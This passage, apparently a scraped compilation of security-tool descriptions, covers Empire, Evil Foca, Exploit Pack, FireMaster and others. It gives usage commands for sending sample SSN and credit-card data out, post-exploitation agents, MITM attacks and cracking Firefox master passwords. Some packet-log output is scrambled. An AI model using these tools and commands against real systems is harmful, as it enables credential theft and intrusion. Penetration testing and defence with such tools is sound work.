co_ccna_640-801_c..></a> 28-Dec-2006 03:48
236K
href="doc/">doc/</a>
19-Sep-2006 01:43

href="freenetproto/">freenetproto/</a>
Dec-2006 09:00
06-

href="korrupt/">korrupt/</a>
11:57
03-Jul-2007

href="mp3_technosets/">mp3_technosets/</a>
Jul-2007 08:56
04-

href="neues_von_rainald_goetz.htm">neues_von_rainald_go..
></a> 21-Mar-2007 23:27
31K

href="neues_von_rainald_goetz0.htm">neues_von_rainald_go.
.></a> 21-Mar-2007 23:29
36K
]"> <a
href="pruef.pdf">pruef.pdf</a>
07:48
28-Dec-2006
88K
<hr></pre>
</body></html>
Chaining decoders to view flow data for a specific country code

in sample traffic (note: TCP handshakes are not included in the
packet count)
Dshell> decode -d country+netflow --country_code=JP ~/
pcap/SkypeIRC.cap
2006-08-25 19:32:20.651502
202.232.205.123
0
36
(-- -> JP)

0
192.168.1.2 ->
UDP
60583
33436
0.0000s
2006-08-25 19:32:20.766761
192.168.1.2 ->
202.232.205.123
0
36
(-- -> JP)

0
UDP
36
(-- -> JP)

0
36
UDP
60583
33435
0.0000s
(-- -> JP)

0
192.168.1.2 ->
2006-08-25 19:32:20.747503
202.232.205.123
33438
0.0000s
2006-08-25 19:32:20.634046
202.232.205.123
60583
192.168.1.2 ->
UDP
60583
33437
0.0000s
Collecting netflow data for sample traffic with vlan headers,

then tracking the connection to a specific IP address
Dshell> decode -d netflow ~/pcap/vlan.cap
1999-11-05 18:20:43.170500
255.255.255.255
0
24
(US -> --)

0
131.151.20.254 ->
UDP
201
(US -> US)

0
24
(US -> --)

0
24
(US -> --)

0
150
(US -> US)

0
24
(US -> --)

0
138
138
131.151.1.254 ->
UDP
520
520
131.151.5.254 ->
UDP
520
520
131.151.104.96 ->
UDP
137
137
1.5020s
1999-11-05 18:20:43.087010
255.255.255.255
UDP
0.0000s
1999-11-05 18:20:41.521798
131.151.107.255
131.151.32.71 ->
0.0000s
1999-11-05 18:20:43.079765
255.255.255.255
0.0000s
1999-11-05 18:20:43.096540
255.255.255.255
520
0.0000s
1999-11-05 18:20:42.063074
131.151.32.255
520
131.151.6.254 ->
UDP
520
520
0.0000s
1999-11-05 18:20:43.368210
131.151.111.254 ->
255.255.255.255
0
24
(US -> --)

0
UDP
24
UDP
24
520
UDP
520
520
131.151.115.254 ->
255.255.255.255
UDP
24
(US -> --)

0
520
520
131.151.107.254 ->
255.255.255.255
UDP
24
(US -> --)

0
201
(US -> US)

0
201
UDP
138
138
0.0000s
(US -> US)

0
520
131.151.5.55 ->
1999-11-05 18:20:43.183825
131.151.32.255
520
0.0000s
1999-11-05 18:20:40.112031
131.151.5.255
0.0000s
1999-11-05 18:20:43.363348
0
0.0000s
1999-11-05 18:20:43.375145
0
131.151.10.254 ->
(US -> --)

0
520
0.0000s
1999-11-05 18:20:43.115330
255.255.255.255
131.151.32.254 ->
(US -> --)

0
520
0.0000s
1999-11-05 18:20:43.250410
255.255.255.255
520
131.151.32.79 ->
UDP
138
138
0.0000s
Download Dshell
EGRESS-ASSESS - TOOL USED TO TEST EGRESS DATA
DETECTION CAPABILITIES
Egress-Assess is a tool used to test egress data detection

capabilities.
Setup
To setup, run the included setup script, or perform the

following:
1. Install pyftpdlib
2. Generate a server certificate and store it as "server.pem"
on the same level as Egress-Assess. This can be done
with the following command:
"openssl req -new -x509 -keyout server.pem -out server.pem days 365 -nodes"
Usage
Typical use case for Egress-Assess is to copy this tool in two

locations. One location will act as the server, the other will act
as the client. Egress-Assess can send data over FTP, HTTP,
and HTTPS.
To extract data over FTP, you would first start Egress-Assesss
FTP server by selecting --server ftp and providing a username
and password to use:
./Egress-Assess.py --server ftp --username testuser -password pass123
Now, to have the client connect and send data to the ftp server,
you could run...
./Egress-Assess.py --client ftp --username testuser -password pass123 --ip 192.168.63.149 --datatype ssn
Also, you can setup Egress-Assess to act as a web server by

running....
./Egress-Assess.py --server https
Then, to send data to the FTP server, and to specifically send

15 megs of credit card data, run the following command...
./Egress-Assess.py --client https --data-size 15 --ip
192.168.63.149 --datatype cc
DownloadEgress-Assess
EMPIRE - POWERSHELL POST-EXPLOITATION AGENT
Empire is a pure PowerShell post-exploitation agent built on

cryptologically-secure communications and a flexible
architecture. Empire implements the ability to run PowerShell
agents without needing powershell.exe, rapidly deployable
post-exploitation modules ranging from key loggers to
Mimikatz, and adaptable communications to evade network
detection, all wrapped up in a usability-focused framework.
Why PowerShell?
PowerShell offers a multitude of offensive advantages,

including full .NET access, application whitelisting, direct
access to the Win32 API, the ability to assemble malicious
binaries in memory, and a default installation on Windows 7+.
Offensive PowerShell had a watershed year in 2014, but
despite the multitude of useful projects, many pentesters still
struggle to integrate PowerShell into their engagements in a
secure manner.
Initial Setup
Run the ./setup/install.sh script. This will install the

fewdependenciesand run the ./setup/setup_database.py
script. The setup_database.py file contains various setting that
you can manually modify, and then initializes the ./data/
empire.db backend database. No additional configuration

should be needed- hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire debug will
generate a verbose debug log at ./empire.debug. The
included ./data/reset.sh will reset/reinitialize the database and
launch Empire in debug mode.
Main Menu
Once you hit the main menu, youll see the number of active
agents, listeners, and loaded modules.
The help command should work for all menus, and almost
everything that can be tab-completable is (menu commands,
agent names, local file paths where relevant, etc.).
You can ctrl+C to rage quit at any point. Starting Empire back
up should preserve existing communicating agents, and any
existing listeners will be restarted (as their config is stored in
the sqlite backend database).
Listeners 101
The first thing you need to do it set up a local listener. The

listeners command will jump you to the listener management
menu. Any active listeners will be displayed, and this
information can be redisplayed at any time with the list
command. The info command will display the currently set
listener options.
The info command will display the currently configured listener

options. Set your host/port by doing something like set Host
http://192.168.52.142:8081. This is tab-completable, andyou
can also use domain names here). The port will automatically
be pulled out, and the backend will detect if youre doing a
HTTP or HTTPS listener. For HTTPS listeners, you must first
set the CertPath to be a local .pem file. The provided ./data/
cert.sh script will generate a self-signed cert and place it in ./
data/empire.pem.
Set optional and WorkingHours, KillDate, DefaultDelay, and
DefaultJitter for the listener, as well as whatever name you
want it to be referred to as. You can then type execute to start
the listener. If the name is already taken, a nameX variant will
be used, and Empire will alert you if the port is already in use.
Stagers 101
The staging process and a complete description of the

available stagers is detailed hereand here.
Empire implements various stagers in a modular format in ./lib/
stagers/*. These include dlls, macros, one-liners, and more. To
use a stager, from the main, listeners, or agents menu, use
usestager <tab>to tab-complete the set of available stagers,
and youll be taken to the individual stagers menu. The UI here
functions similarly to the post module menu, i.e set/unset/info
and generate to generate the particular output code.
For UserAgent and proxy options, default uses the system
defaults, none clears that option from being used in the stager,
and anything else is assumed to be a custom setting (note, this
last bit isnt properly implemented for proxy settings yet). From
the Listeners menu, you can run the launcher [listener ID/
name]alias to generate the stage0 launcher for a particular
listener (this is the stagers/launcher module in the
background). This command can be run from a command
prompt on any machine to kick off the staging process. (NOTE:
you will need to right click cmd.exe and choose run as
administrator before pasting/running this command if you want

to use modules that require administrative privileges). Our
PowerShell version of BypassUAC module is in the works but
not 100% complete yet.
Agents 101
You should see a status message when an agent checks in

(i.e. [+] Initial agent CGUBKC1R3YLHZM4V from
192.168.52.168 now active). Jump to the Agents menu with
agents. Basic information on active agents should be
displayed. Various commands can be executed on specific
agent IDs or all from the agent menu, i.e. kill all. To interact
with an agent, use interact AGENT_NAME. Agent names
should be tab-completable for all commands.
In an Agent menu, info will display more detailed agent

information, and help will display all agent commands. If a
typed command isnt resolved, Empire will try to interpret it as a
shell command (like ps). You can cd directories, upload/
download files, and rename NEW_NAME.
For each registered agent, a ./downloads/AGENT_NAME/
folder is created (this folder is renamed with an agent rename).
An ./agent.log is created here with timestamped commands/
results for agent communication. Downloads/module outputs
are broken out into relevant folders here as well.

When youre finished with an agent, use exitfrom the Agent
menu or kill NAME/all from the Agents menu. Youll get a red
notification when the agent exits, and the agent will be removed
from the interactive list after.
Modules 101
To see available modules, type usemodule <tab>. To search

module names/descriptions, use searchmodule privesc and
matching module names/descriptions will be output.
To use a module, for example netview from PowerView, type
usemodule situational_awareness/network/sharefinderand
press enter. info will display all current module options.
To set an option, like the domain for sharefinder, use set

Domain testlab.local. The Agent argument is always required,
and should be auto-filled from jumping to a module from an
agent menu. You can also set Agent <tab>to tab-complete an
agent name. execute will task the agent to execute the module,
and back will return you to the agents main menu. Results will
be displayed as they come back.
Scripts
In addition to formalized modules, you are able to simply import

and use a .ps1 script in your remote empire agent. Use the
scriptimport ./path/ command to import the script. The script

will be imported and any functions accessible to the script will
now be tab completable using the scriptcmd command in the
agent. This works well for very large scripts with lots of
functions that you do not want to break into a module.
DownloadEmpire
EVIL FOCA - MITM, DOS, DNS HIJACKING IN IPV4 AND
IPV6 PENETRATION TESTING TOOL
Evil Foca is a tool for security pentesters and auditors whose

purpose it is to test security in IPv4 and IPv6 data networks.
The tool is capable of carrying out various attacks such as:
MITM over IPv4 networks with ARP Spoofing and DHCP
ACK Injection.
MITM on IPv6 networks with Neighbor Advertisement

Spoofing, SLAAC attack, fake DHCPv6.
DoS (Denial of Service) on IPv4 networks with ARP
Spoofing.
DoS (Denial of Service) on IPv6 networks with SLAAC
DoS.
DNS Hijacking.
The software automatically scans the networks and identifies all
devices and their respective network interfaces, specifying their
IPv4 and IPv6 addresses as well as the physical addresses
through a convenient and intuitive interface.
Requirements
Windows XP or later.
.NET Framework 4 or later.
Winpcap library (http://www.winpcap.org)
Man In The Middle (MITM) attack
The well-known Man In The Middle is an attack in which the

wrongdoer creates the possibility of reading, adding, or
modifying information that is located in a channel between two
terminals with neither of these noticing. Within the MITM
attacks in IPv4 and IPv6 Evil Foca considers the following
techniques:
ARP Spoofing: Consists in sending ARP messages to the
Ethernet network. Normally the objective is to associate
the MAC address of the attacker with the IP of another
device. Any traffic directed to the IP address of the
predetermined link gate will be erroneously sent to the
attacker instead of its real destination.
DHCP ACK Injection: Consists in an attacker monitoring
the DHCP exchanges and, at some point during the
communication, sending a packet to modify its behavior.
Evil Foca converts the machine in a fake DHCP server on
the network.
Neighbor Advertisement Spoofing: The principle of this

attack is identical to that of ARP Spoofing, with the
difference being in that IPv6 doesnt work with the ARP
protocol, but that all information is sent through ICMPv6
packets. There are five types of ICMPv6 packets used in
the discovery protocol and Evil Foca generates this type of
packets, placing itself between the gateway and victim.
SLAAC attack: The objective of this type of attack is to be
able to execute an MITM when a user connects to Internet
and to a server that does not include support for IPv6 and
to which it is therefore necessary to connect using IPv4.
This attack is possible due to the fact that Evil Foca
undertakes domain name resolution once it is in the
communication media, and is capable of transforming
IPv4 addresses in IPv6.
Fake DHCPv6 server: This attack involves the attacker
posing as the DCHPv6 server, responding to all network
requests, distributing IPv6 addresses and a false DNS to
manipulate the user destination or deny the service.
Denial of Service (DoS) attack: The DoS attack is an
attack to a system of machines or network that results in a
service or resource being inaccessible for its users.
Normally it provokes the loss of network connectivity due
to consumption of the bandwidth of the victims network,
or overloads the computing resources of the victims
system.
DoS attack in IPv4 with ARP Spoofing: This type of DoS
attack consists in associating a nonexistent MAC address
in a victims ARP table. This results in rendering the
machine whose ARP table has been modified incapable of
connecting to the IP address associated to the nonexistent
MAC.
DoS attack in IPv6 with SLAAC attack: In this type of
attack a large quantity of router advertisement packets
are generated, destined to one or several machines,
announcing false routers and assigning a different IPv6
address and link gate for each router, collapsing the

system and making machines unresponsive.
DNS Hijacking: The DNS Hijacking attack or DNS
kidnapping consists in altering the resolution of the
domain names system (DNS). This can be achieved using
malware that invalidates the configuration of a TCP/IP
machine so that it points to a pirate DNS server under the
attackers control, or by way of an MITM attack, with the
attacker being the party who receives the DNS requests,
and responding himself or herself to a specific DNS
request to direct the victim toward a specific destination
selected by the attacker.
DownloadEvil FOCA
EXPLOIT PACK - OPEN SOURCE SECURITY PROJECT
FOR PENETRATION TESTING AND EXPLOIT
DEVELOPMENT
Exploit Pack, is an open source GPLv3 security tool, this

means it is fully free and you can use it without any kind of
restriction. Other security tools like Metasploit, Immunity
Canvas, or Core Iimpact are ready to use as well but you will
require an expensive license to get access to all the features,
for example: automatic exploit launching, full report capabilities,
reverse shell agent customization, etc. Exploit Pack is fully free,
open source and GPLv3. Because this is an open source
project you can always modify it, add or replace features and
get involved into the next project decisions, everyone is more
than welcome to participate. We developed this tool thinking for
and as pentesters. As security professionals we use Exploit
Pack on a daily basis to deploy real environment attacks into
real corporate clients.
Video demonstration of the latest Exploit Pack release:
An error occurred.
More than 300+ exploits
Military grade professional security tool

Exploit Pack comes into the scene when you need to execute a
pentest in a real environment, it will provide you with all the
tools needed to gain access and persist by the use of remote
reverse agents.
Remote Persistent Agents
Reverse a shell and escalate privileges
Exploit Pack will provide you with a complete set of features to

create your own custom agents, you can include exploits or
deploy your own personalized shellcodes directly into the
agent.
Write your own Exploits
Use Exploit Pack as a learning platform

Quick exploit development, extend your capabilities and code
your own custom exploits using the Exploit Wizard and the
built-in Python Editor moded to fullfill the needs of an Exploit
Writer.
Download Exploit Pack

FARADAY 1.0.15 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM
A brand new version is ready for you to enjoy! Faraday v1.0.15

(Community, Pro & Corp) was published today with new
exciting features.
As a part of our constant commitment to the IT sec community
we added a tool that runs several other tools to all IPs in a
given list. This results in a major scan to your infrastructure
which can be done as frequently as necessary. Interested?
Read more about ithere.
This version also features three new plugins and a fix
developed entirely by our community! Congratulations
toAndresandEzequielfor being the first two winners of
theFaraday Challenge! Are you interested in winning tickets for
Ekoparty as well? Submit your pull request or find us on
freenode #faraday-dev and let us know.
Changes:
* Continuous Scanning Tool cscan added to ./scripts/cscan

* Hosts and Services views now have pagination and search
* Updates version number on Faraday Start

* Added Services columns to Status Report
* Converted references to links in Status Report. Support for

CVE, CWE, Exploit Database and Open Source Vulnerability
Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer
plugins
Fixes:
* Debian install
* Saving objects without parent
* Visual fixes on Firefox
DownloadFaraday 1.0.15
FARADAY 1.0.16 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM
Faraday introduces a new concept - IPE (Integrated

Penetration-Test Environment) a multiuser Penetration test
IDE. Designed for distribution, indexation and analysis of the
generated data during the process of a security audit.
This version comes with major changes to our Web UI,
including the possibility to mark vulnerabilities as false
positives. If you have a Pro or Corp license you can now create
an Executive Report using only confirmed vulnerabilities,
saving you even more time.
A brand new feature that comes with v1.0.16 is the ability to
group vulnerabilities by any field in our Status Report view.
Combine it with bulk edit to manage your findings faster than
ever!
This release also features several new features developed
entirely by our community.
Changes:
* Added group vulnerabilities by any field in our Status Report
* Added port to Service type target in new vuln modal

* Filter false-positives in Dashboard, Status Report and
Executive Report (Pro&Corp)
Filter in Status Report view

* Added Wiki information about running Faraday without
configuring CouchDB https://github.com/infobyte/faraday/wiki/
APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
- get all IPs from targets that have no services (/bin/
getAllIpsNotServices.py)
/bin/getAllIpsNotServices.py
- get all IP addresses that have defined open port (/bin/
getAllbySrv.py) and get all IPs from targets without services (/
bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a
variable that you can modify to alter its behaviour. /bin/
getAllbySrv.py has a port variable set to 8080 by default. /bin/
delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
- Immunity Canvas
Canvas configuration
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto
Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe"
strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors
DownloadFaraday1.0.16
FARADAY V1.0.7 - INTEGRATED PENETRATION-TEST
ENVIRONMENT A MULTIUSER PENETRATION TEST IDE
Faraday introduces a new concept (IPE) Integrated

Penetration-Test Environment a multiuser Penetration test IDE.
Designed for distribution, indexation and analysis of the
generated data during the process of a security audit.
The main purpose of Faraday is to re-use the available tools in
the community to take advantage of them in a multiuser way.
Designed for simplicity, users should notice no difference
between their own terminal application and the one included in
Faraday. Developed with a specialized set of functionalities that
help users improve their own work. Do you remember yourself
programming without an IDE? Well, Faraday does the same as
an IDE does for you when programming, but from the
perspective of a penetration test.
Changes made to the UX/UI:

Improved Vulnerability Edition usability, selecting a
vulnerability will load it's content automatically.
ZSH UI now is showing notifications.
ZSH UI displays active workspaces.
Faraday now asks confirmation when exiting out. If you
have pending conflicts to resolve it will show the number
for each one.
Vulnerability creation is now supported in the status
report.
Introducing SSLCheck, a tool forverifyingbugs in SSL/
TLS Certificates on remote hosts. Thisis integrated with
Faraday as a plugin.
Shodan Plugin is now working with the new API.
Some cosmetic changes for the status report.
Bugfixes:
Sorting columns in the Status Report is running smoothly.
The Workspace icon is now based on the type of

workspace being used.
Opening the reports in QT UI opens the active workspace.
UI Web dates fixes, we were showing dates with a off-byone error.
Vulnerability edition was missing 'critical' severity.
Objects merge bugfixing
Metadata recursive save fix
DownloadFaraday
FASTNETMON - VERY FAST DDOS ANALYZER WITH
SFLOW/NETFLOW/MIRROR SUPPORT
A high performance DoS/DDoS load analyzer built on top of

multiple packet capture engines (NetFlow, IPFIX, sFLOW,
netmap, PF_RING, PCAP).
What can we do? We can detect hosts in our own network with
a large amount of packets per second/bytes per second or flow
per second incoming or outgoing from certain hosts. And we
can call an external script which can notify you, switch off a
server or blackhole the client.

Features:
Can process incoming and outgoing traffic

Can trigger block script if certain IP loads network with a
large amount of packets/bytes/flows per second
Could announce blocked IPs to BGP router with ExaBGP
Have integration with Graphite
netmap support (open source; wire speed processing;
only Intel hardware NICs or any hypervisor VM type)
Supports L2TP decapsulation, VLAN untagging and MPLS
processing in mirror mode
Can work on server/soft-router
Can detect DoS/DDoS in 1-2 seconds
Tested up to 10GE with 5-6 Mpps on Intel i7 2600 with
Intel Nic 82599
Complete plugin support
Have complete support for most popular attack types
Supported platforms:
Linux (Debian 6/7/8, CentOS 6/7, Ubuntu 12+)

FreeBSD 9, 10, 11
Mac OS X Yosemite
What is "flow" in FastNetMon terms? It's one or multiple udp,
tcp, icmp connections with unique src IP, dst IP, src port, dst
port and protocol.
Example for cpu load on Intel i7 2600 with Intel X540/82599
NIC on 400 kpps load:
To enable sFLOW simply specify IP of server with installed

FastNetMon and specify port 6343. To enable netflow simply
specify IP of server with installed FastNetMon and specify port
2055.
Why did we write this? Because we can't find any software for
solving this problem in the open source world!
DownloadFastNetMon
FING - FIND OUT WHICH DEVICES ARE CONNECTED TO
YOUR WI-FI NETWORK
Find out which devices are connected to your Wi-Fi network, in

just a few seconds.
Fast and accurate, Fing is a professional App for network
analysis. A simple and intuitive interface helps you evaluate
security levels, detect intruders and resolve network issues.
Discovers all devices connected to a Wi-Fi network.
Unlimited devices and unlimited networks, for free!
Displays MAC Address and device manufacturer.
Enter your own names, icons, notes and location
Full search by IP, MAC, Name, Vendor and Notes
History of all discovered networks.
Share via Twitter, Facebook, Message and E-mail
Service Scan: Find hundreds of open ports in a few
seconds.
Wake On LAN: Switch on your devices from your mobile
or tablet!
Ping and traceroute: Understand your network
performances.
Automatic DNS lookup and reverse lookup
Checks the availability of Internet connection
Works also with hosts outside your local network
Tracks when a device has gone online or offline
Launch Apps for specific ports, such as Browser, SSH,
FTP
Displays NetBIOS names and properties
Displays Bonjour info and properties
Supports identification by IP address for bridged networks
Sort by IP, MAC, Name, Vendor, State, Last Change.
Free of charge, no banner Ads
Available for iPhone, iPad and iPod Touch with retina and
standard displays.
Integrates with Fingbox to sync and backup your
customizations, merge networks with multiple access
points, monitor remote networks via Fingbox Sentinels,
get notifications of changes, and much more.
Fing is available on several other platforms, including
Windows, OS X and Linux. Check them out!
DownloadFing
FIREFOX AUTOCOMPLETE SPY - TOOL TO VIEW OR
DELETE AUTOFILL DATA FROM MOZILLA FIREFOX
Firefox Autocomplete Spy is the free tool to easily view and

delete all your autocomplete data from Firefox browser.
Firefox stores Autocomplete entries (typically form fields) such
as login name, email, address, phone, credit/debit card
number, search history etc in an internal database file.
'Firefox Autocomplete Spy' helps you to automatically find
and view all the Autocomplete history data from Firefox profile
location. For each of the entry, it display following details,
Field Name
Value
Total Used Count
First Used Date
Last Used Date
You can also use it to view from history file belonging to

another user on same or remote system. It also provides
one click solution to delete all the displayed Autocomplete data
from the history file.
It is very simple to use for everyone, especially makes it handy
tool for Forensic investigators.
Firefox Autocomplete Spy is fully portable and works on both
32-bit & 64-bit platforms starting from Windows XP to Windows
8.
Features
Instantly view all the autocomplete data from Firefox form

history file
On startup, it auto detects Autocomplete file from default
profile location
Sort feature to arrange the data in various order to make it
easier to search through 100's of entries.
Delete all the Autocomplete data with just a click of button
Save the displayed autocomplete list to HTML/XML/TEXT/
CSV file
Easier and faster to use with its enhanced user friendly
GUI interface
Fully Portable, does not require any third party
components like JAVA, .NET etc
software
How to Use
Firefox Autocomplete Spy is easy to use with its simple GUI

interface.
Here are the brief usage details
Launch FirefoxAutocompleteSpy on your system
By default it will automatically find and display the
autocomplete file from default profile location. You can
also select the desired file manually.
Next click on 'Show All' button and all stored
Autocomplete data will be displayed in the list as shown in
screenshot 1 below.
If you want to remove all the entries, click on 'Delete All'
button below.
Finally you can save all displayed entries to HTML/XML/
TEXT/CSV file by clicking on 'Export' button and then
select the type of file from the drop down box of 'Save File
Dialog'.
DownloadFirefox Autocomplete Spy

FIREMASTER - THE FIREFOX MASTER PASSWORD
CRACKING TOOL
FireMaster is the First ever tool to recover the lost Master

Password of Firefox.
Master password is used by Firefox to protect the stored loign/
password information for all visited websites. If the master
password is forgotten, then there is no way to recover the
master password and user will lose all the passwords stored in
it.
However you can now use FireMaster to recover the forgotten
master password and get back all the stored Login/Passwords.

FireMaster supports Dictionary, Hybrid, Brute-force and
advanced Pattern based Brute-force password cracking
techniques to recover from simple to complex password.
Advanced pattern based password recovery mechanism
reduces cracking time significantly especially when the
password is complex.
FireMaster is successfully tested with all versions of Firefox
starting from 1.0 to latest version v13.0.1.
It works on wide range of platforms starting from Windows XP
to Windows 8.
Firefox Password Manager and Master Password
Firefox comes with built-in password manager tool which

remembers username and passwords for all the websites you
visit. This login/password information is stored in the
encrypted form in Firefox database files residing in user's
profile directory.
However any body can just launch the password manager from
the Firefox browser and view the credentials. Also one can just
copy these database files to different machine and view it
offline using the tools such as FirePassword.
Hence to protect from such threats, Firefox uses master
password to provide enhanced security. By default Firefox
does not set the master password. However once you have set
the master password, you need to provide it every time to view
login credentials. So if you lose the master password then that
means you have lost all the stored passwords as well.
So far there was no way to recover these credentials once you
have lost the master password. Now the FireMaster can help
you to recover the master password and get back all the signon information.
Internals of FireMaster
Once you have lost master password, there is no way to

recover it as it is not stored at all.
Whenever user enters the master password, Firefox uses it to
decrypt the encrypted data associated with the known string. If
the decrypted data matches this known string then the entered
password is correct. FireMaster uses the similar technique to
check for the master password, but in more optimized way.
The entire operation goes like this.
FireMaster generates passwords on the fly through

various methods.
Then it computes the hash of the password using known

algorithm.
Next this password hash is used to decrypt the encrypted

data for known plain text (i.e. "password-check").
Now if the decrypted string matches with the known plain

text (i.e. "password-check") then the generated password
is the master password.
Firefox stores the details about encrypted string, salt, algorithm

and version information in key database file key3.db in the
user's profile directory. You can just copy this key3.db file to
different directory and specify the corresponding path to
FireMaster. You can also copy this key3.db to any other high
end machine for faster recovery operation.
FireMaster supports following password recovery methods
1) Dictionary Cracking Method

In this mode, FireMaster uses dictionary file having each word
on separate line to perform the operation. You can find lot of
online dictionary with different sizes and pass it on to
Firemaster. This method is more quicker and can find out
common passwords.
2) Hybrid Cracking Method
This is advanced dictionary method, in which each word in the
dictionary file is prefixed or suffixed with generated word from
known character list. This can find out password like pass123,
12test, test34 etc. From the specified character list (such as
123), all combinations of strings are generated and appended
or prefixed to the dictionary word based on user settings.
3) Brute-force Cracking Method
In this method, all possible combinations of words from given
character list is generated and then subjected to cracking
process. This may take long time depending upon the number
of characters and position count specified.
4) Pattern based Brute-force Cracking Method
Pattern based cracking method significantly reduces the
password recovery time especially when password is complex.
This method can be used when you know the exact password
length and remember few characters.
How to use FireMaster?
First you need to copy the key3.db file to temporary directory.

Later you have to specify this directory path for FireMaster as a
last argument.
Here is the general usage information
Firemaster [-q]
[-d -f ]
[-h -f
-n
-g "charlist" [ -s | -p ] ]
[-b -m
-l
-c "charlist" -p "pattern" ]
Note: With v5.0 onwards, you can specify 'auto' (without

quotes) in place of "" to automatically detect default
profile path.
Dictionary Crack Options:
-d
Perform dictionary crack
-f
Dictionary file with words on each line
Hybrid Crack Options:

-h
Perform hybrid crack operation using dictionary
passwords.
Hybrid crack can find passwords like pass123, 123pass etc
-f
Dictionary file with words on each line
-g
Group of characters used for generating the
strings
-n
Maximum length of strings to be generated using
above character list

These strings are added to the dictionary word to form
the password
-s
Suffix the generated characters to the dictionary
word(pass123)
-p
Prefix the generated characters to the dictionary
word(123pass)
Brute Force Crack Options:
-b
Perform brute force crack
-c
Character list used for brute force cracking
process
-m
[Optional] Specify the minimum length of password
-l
Specify the maximum length of password
-p
[Optional] Specify the pattern for the password
Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s
auto
// Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my
test\firefox"
// Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??
123" auto
Download FireMaster
FIREMASTERCRACKER - FIREFOX MASTER PASSWORD
CRACKING SOFTWARE
Firefox browser uses Master password to protect the stored

login passwords for all visited websites. If the master password
is forgotten, then there is no way to recover the Master
Password and user will also lose all the webiste login
passwords.
In such cases, FireMasterCracker can help you to recover the
lost Master Password. It uses dictionary based password
cracking method. You can find good collection of password

dictionaries (also called wordlist).
Though it supports only Dictinary Crack method, you can easily
use tools like Crunch, Cupp to generate brute-force based or
any custom password list file and then use it with
FireMasterCracker.
It is very easy to use with its cool & simple interface. It is
designed to make it very simpler and quicker for users who find
it difficult to use command-line based FireMaster.
FireMasterCracker works on wide range of platforms starting

from Windows XP to Windows 8.
Features
Here are prime features of FireMasterCracker

Free & Easiest tool to recover the Firefox Master
Password
Supports Dictionary based Password Recovery method
Automatically detects the current Firefox profile location
Displays detailed statistics during Cracking operation
Stop the password cracking operation any time.
Easy to use with cool graphics interface.
Generate Password Recovery report in HTML/XML/TEXT
format.
Includes Installer for local Installation & Uninstallation.
DownloadFireMasterCracker
FIREPASSWORD - FIREFOX USERNAME & PASSWORD
RECOVERY TOOL
FirePassword is first ever tool (back in early 2007) released to

recover the stored website login passwords from Firefox
Browser.
Like other browsers, Firefox also stores the login details such
as username, password for every website visited by the user at
the user consent. All these secret details are stored in Firefox
sign-on database securely in an encrypted format.
FirePassword can instantly decrypt and recover these

secrets even if they are protected with Master Password.
Also FirePassword can be used to recover sign-on passwords
from different profile (for other users on the same system) as
well as from the different operating system (such as Linux, Mac
etc). This greatly helps forensic investigators who can copy the
Firefox profile data from the target system to different machine
and recover the passwords offline without affecting the target
environment.
This mega release supports password recovery from new
password file 'logins.json' starting with Firefox version 32.x.
Note: FirePassword is not hacking or cracking tool as it can
only help you to recover your own lost website passwords that
are previously stored in Firefox browser.
It works on wider range of platforms starting from Windows XP
to Windows 8.
Features
Instantly decrypt and recover stored encrypted passwords

from 'Firefox Sign-on Secret Store' for all versions of
Firefox.
Recover Passwords from Mozilla based SeaMonkey
browser also.
Supports recovery of passwords from local system as well
as remote system. User can specify Firefox profile location
from the remote system to recover the passwords.
It can recover passwords from Firefox secret store even
when it is protected with master password. In such case
user have to enter the correct master password to
successfully decrypt the sign-on passwords.

Automatically discovers Firefox profile location based on
installed version of Firefox.
On successful recovery operation, username, password
along with a corresponding login website is displayed
Fully Portable version, can be run from anywhere.
Integrated Installer for assisting you in local Installation &
Uninstallation.
DownloadFirePassword
FLASHLIGHT - AUTOMATED INFORMATION GATHERING
TOOL FOR PENETRATION TESTERS
Pentesters spend too much time during information gathering

phase. Flashlight (Fener) provides services to scan network/
ports and gather information rapidly on target networks. So
Flashlight should be the choice to automate discovery step
during a penetration test. In this article, usage of Flashligh
application will be explained.

For more information about using Flashlight, "-h" or "-help"
option can be used.
Parameters for the usage of this application can be listed below
-h, --help: It shows the information about using the

Flashlight application.
-p <ProjectName> or --project < ProjectName>: It sets
project name with the name given. This paramater can be
used to save different projects in different workspaces.
-s <ScanType> or scan_type < ScanType >: It sets the
type of scans. There are four types of scans: Active Scan ,
Passive Scan, Screenshot Scan and Filtering. These
types of scans will be examined later in detail.
-d < DestinationNetwork>, --destination <
DestinationNetwork >: It sets the network or IP where the
scan will be executed against.
-c <FileName>, --config <FileName>: It specifies the
configuration file. The scanning is realized according to
the information in the configuration file.
-u <NetworkInterface>, --interface < NetworkInterface>: It
sets the network interface used during passive scanning.
-f <PcapFile>, --pcap_file < PcapFile >: It sets cap File
that will be filtered.
-r <RasterizeFile>, --rasterize < RasterizeFile>: It sets the
specific location of Rasterize JavaScript file which will be
used for taking screenshots.
-t <ThreadNumber>, --thread <Threadnember>: It sets the
number of Threads. This parameter is valid only on
screenshot scanning (screen scan) mode.
-o <OutputDiectory>, --output < OutputDiectory >: It sets
the directory in which the scan results can be saved. The
scan results are saved in 3 sub-directories : For Nmap
scanning results, "nmap" subdirectory, for PCAP files
"pcap" subdirectory and for screenshots "screen"

subdirectories are used. Scan results are saved in
directory, shown under the output directories by this
parameter. If this option is not set, scan results are saved
in the directory that Flashlight applications are running.
-a, --alive: It performs ping scan to
-I parameter is chosen.
